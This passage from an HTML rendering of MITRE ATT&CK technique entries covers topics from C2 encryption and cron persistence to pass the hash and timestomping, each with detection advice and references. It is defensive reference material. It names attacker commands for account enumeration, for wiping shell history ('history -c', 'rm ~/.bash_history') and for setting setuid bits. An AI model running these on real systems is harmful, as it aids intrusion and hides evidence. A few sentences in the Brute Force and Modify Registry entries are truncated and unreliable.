<h3 id="_multilayer_encryption"><a class="anchor" href="#_multilayer_encryption"></a><a class="link" href="#_multilayer_encryption">Multilayer Encryption</a></h3>
<div class="paragraph">
<p>An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</p>
</div>
<div class="paragraph">
<p>Detection: If malware uses Standard Cryptographic Protocol, SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels.Custom Cryptographic Protocol, if malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.[[Citation: Fidelis DarkComet]]</p>
</div>
<div class="paragraph">
<p>In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Process use of network, Malware reverse engineering, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 595. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1079">https://attack.mitre.org/wiki/Technique/T1079</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf">https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840">http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html">https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_component_firmware"><a class="anchor" href="#_component_firmware"></a><a class="link" href="#_component_firmware">Component Firmware</a></h3>
<div class="paragraph">
<p>Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 596. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1109">https://attack.mitre.org/wiki/Technique/T1109</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cron_job"><a class="anchor" href="#_cron_job"></a><a class="link" href="#_cron_job">Cron Job</a></h3>
<div class="paragraph">
<p>Per Apples developer documentation, there are two supported methods for creating periodic background jobs: launchd and cron[[Citation: AppleDocs Scheduling Timed Jobs]].</p>
</div>
<div class="paragraph">
<p>===Launchd===</p>
</div>
<div class="paragraph">
<p>Each Launchd job is described by a different configuration property list (plist) file similar to Launch Daemons or Launch Agents, except there is an additional key called &lt;code&gt;StartCalendarInterval&lt;/code&gt; with a dictionary of time values [[Citation: AppleDocs Scheduling Timed Jobs]]. This only works on macOS and OS X.</p>
</div>
<div class="paragraph">
<p>===cron===</p>
</div>
<div class="paragraph">
<p>System-wide cron jobs are installed by modifying &lt;code&gt;/etc/crontab&lt;/code&gt; while per-user cron jobs are installed using crontab with specifically formatted crontab files [[Citation: AppleDocs Scheduling Timed Jobs]]. This works on Mac and Linux systems.</p>
</div>
<div class="paragraph">
<p>Both methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence[[Citation: Janicab]][[Citation: Methods of Mac Malware Persistence]][[Citation: Malware Persistence on OS X]], to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.</p>
</div>
<div class="paragraph">
<p>Detection: Legitimate scheduled jobs may be created during installation of new software or through administration functions. Tasks scheduled with launchd and cron can be monitored from their respective utilities to list out detailed information about the jobs. Monitor process execution resulting from launchd and cron tasks to look for unusual or unknown applications and behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 597. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1168">https://attack.mitre.org/wiki/Technique/T1168</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thesafemac.com/new-signed-malware-called-janicab/">http://www.thesafemac.com/new-signed-malware-called-janicab/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_event_subscription"><a class="anchor" href="#_windows_management_instrumentation_event_subscription"></a><a class="link" href="#_windows_management_instrumentation_event_subscription">Windows Management Instrumentation Event Subscription</a></h3>
<div class="paragraph">
<p>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts.[[Citation: Dell WMI Persistence]] Examples of events that may be subscribed to are the wall clock time or the computer&#8217;s uptime.[[Citation: Kazanciyan 2014]] Several threat groups have reportedly used this technique to maintain persistence.[[Citation: Mandiant M-Trends 2015]]</p>
</div>
<div class="paragraph">
<p>Detection: Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.[[Citation: TechNet Autoruns]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: WMI Objects</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 598. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1084">https://attack.mitre.org/wiki/Technique/T1084</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/blog/wmi-persistence">https://www.secureworks.com/blog/wmi-persistence</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf">https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_disabling_security_tools"><a class="anchor" href="#_disabling_security_tools"></a><a class="link" href="#_disabling_security_tools">Disabling Security Tools</a></h3>
<div class="paragraph">
<p>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, File monitoring, Services, Windows Registry, Process command-line parameters, Anti-virus</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 599. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1089">https://attack.mitre.org/wiki/Technique/T1089</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_peripheral_device_discovery"><a class="anchor" href="#_peripheral_device_discovery"></a><a class="link" href="#_peripheral_device_discovery">Peripheral Device Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 600. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1120">https://attack.mitre.org/wiki/Technique/T1120</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_compressed"><a class="anchor" href="#_data_compressed"></a><a class="link" href="#_data_compressed">Data Compressed</a></h3>
<div class="paragraph">
<p>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</p>
</div>
<div class="paragraph">
<p>Detection: Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.</p>
</div>
<div class="paragraph">
<p>If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers.[[Citation: Wikipedia File Header Signatures]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters, Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 601. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1002">https://attack.mitre.org/wiki/Technique/T1002</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/List%20of%20file%20signatures">https://en.wikipedia.org/wiki/List%20of%20file%20signatures</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_account_discovery"><a class="anchor" href="#_account_discovery"></a><a class="link" href="#_account_discovery">Account Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of local system or domain accounts.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Example commands that can acquire this information are &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net group &lt;groupname&gt;&lt;/code&gt;, and &lt;code&gt;net localgroup &lt;groupname&gt;&lt;/code&gt; using the Net utility or through use of dsquery. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, System Owner/User Discovery may apply.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On Mac, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>On Linux, local users can be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file which is world readable. In mac, this same file is only used in single-user mode in addition to the &lt;code&gt;/etc/master.passwd&lt;/code&gt; file.</p>
</div>
<div class="paragraph">
<p>Also, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 602. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1087">https://attack.mitre.org/wiki/Technique/T1087</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pass_the_hash"><a class="anchor" href="#_pass_the_hash"></a><a class="link" href="#_pass_the_hash">Pass the Hash</a></h3>
<div class="paragraph">
<p>Pass the hash (PtH)[[Citation: Aorato PTH]] is a method of authenticating as a user without having access to the user&#8217;s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a [[Credential Access]] technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.</p>
</div>
<div class="paragraph">
<p>Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.[[Citation: NSA Spotting]]</p>
</div>
<div class="paragraph">
<p>Detection: Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 603. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1075">https://attack.mitre.org/wiki/Technique/T1075</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nsa.gov/ia/%20files/app/spotting%20the%20adversary%20with%20windows%20event%20log%20monitoring.pdf">http://www.nsa.gov/ia/%20files/app/spotting%20the%20adversary%20with%20windows%20event%20log%20monitoring.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.aorato.com/labs/pass-the-hash/">http://www.aorato.com/labs/pass-the-hash/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clear_command_history"><a class="anchor" href="#_clear_command_history"></a><a class="link" href="#_clear_command_history">Clear Command History</a></h3>
<div class="paragraph">
<p>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they&#8217;ve done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user&#8217;s home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they&#8217;ve used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as &lt;code&gt;unset HISTFILE&lt;/code&gt;, &lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;, &lt;code&gt;history -c&lt;/code&gt;, &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Detection: User authentication, especially via remote terminal services like SSH, without new entries in that user&#8217;s &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file are indicators of suspicious activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 604. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1146">https://attack.mitre.org/wiki/Technique/T1146</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_timestomp"><a class="anchor" href="#_timestomp"></a><a class="link" href="#_timestomp">Timestomp</a></h3>
<div class="paragraph">
<p>Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name Masquerading to hide malware and tools.[[Citation: WindowsIR Anti-Forensic Techniques]]</p>
</div>
<div class="paragraph">
<p>Detection: Forensic techniques exist to detect aspects of files that have had their timestamps modified.[[Citation: WindowsIR Anti-Forensic Techniques]] It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 605. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1099">https://attack.mitre.org/wiki/Technique/T1099</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html">http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_setuid_and_setgid"><a class="anchor" href="#_setuid_and_setgid"></a><a class="link" href="#_setuid_and_setgid">Setuid and Setgid</a></h3>
<div class="paragraph">
<p>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively. Normally an application is run in the current users context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesnt need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file&#8217;s attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different users context.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator, root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 606. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1166">https://attack.mitre.org/wiki/Technique/T1166</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_brute_force"><a class="anchor" href="#_brute_force"></a><a class="link" href="#_brute_force">Brute Force</a></h3>
<div class="paragraph">
<p>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.</p>
</div>
<div class="paragraph">
<p>Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</p>
</div>
<div class="paragraph">
<p>Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>Contributors: John Strand</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 607. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1110">https://attack.mitre.org/wiki/Technique/T1110</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.blackhillsinfosec.com/?p=4645">http://www.blackhillsinfosec.com/?p=4645</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cylance.com/assets/Cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">http://www.cylance.com/assets/Cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Password%20cracking">https://en.wikipedia.org/wiki/Password%20cracking</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_modify_registry"><a class="anchor" href="#_modify_registry"></a><a class="link" href="#_modify_registry">Modify Registry</a></h3>
<div class="paragraph">
<p>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Reg may be used for local or remote Registry modification.Valid Accounts are required, along with access to the remote system&#8217;s Windows Admin Shares for RPC communication.</p>
</div>
<div class="paragraph">
<p>Detection: Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 608. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1112">https://attack.mitre.org/wiki/Technique/T1112</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc754820.aspx">https://technet.microsoft.com/en-us/library/cc754820.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc732643.aspx">https://technet.microsoft.com/en-us/library/cc732643.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
